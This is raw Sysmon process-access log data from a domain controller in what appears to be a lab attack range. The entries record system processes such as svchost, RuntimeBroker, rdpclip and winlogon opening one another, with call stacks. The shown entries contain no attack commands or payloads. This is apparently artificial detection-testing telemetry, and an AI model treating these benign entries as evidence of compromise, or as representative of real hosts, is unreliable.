13:58:17.430{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.430{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.430{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.430{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.430{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|c:\windows\system32\lsm.dll+23fc9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.430{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.414{59A5CD1D-8E46-6005-1600-00000000A301}15442288C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.414{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.399{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.399{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.399{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.368{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.368{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.368{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.368{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
